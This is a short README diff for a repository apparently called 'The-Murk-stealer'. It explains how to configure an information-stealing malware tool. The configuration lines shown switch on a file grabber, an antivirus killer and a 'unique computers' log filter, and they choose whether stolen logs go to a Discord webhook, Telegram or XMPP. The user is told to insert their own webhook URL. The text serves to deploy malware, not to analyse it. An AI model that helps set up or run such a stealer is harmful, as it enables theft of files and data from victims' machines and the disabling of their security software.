Choomai/The-Murk-stealer/README.md

 ### 🎮For Discord
 Finally, insert the name and webhook link in the `TheMurk.py` here
 ```
+enableFileGrubber = False #enable file grabber
-enableFileGrubber = False # do you want to use file grubber
+oneStart = False #enable this if you want logs to come only from unique computers
+avKiller = False #enable antiviruses killer
 sendType = 0 # 0 via Discord; 1 via Telegram; 2 via XMPP
 discordData = ["url of your WebHook","name of that WebHook"]
 ```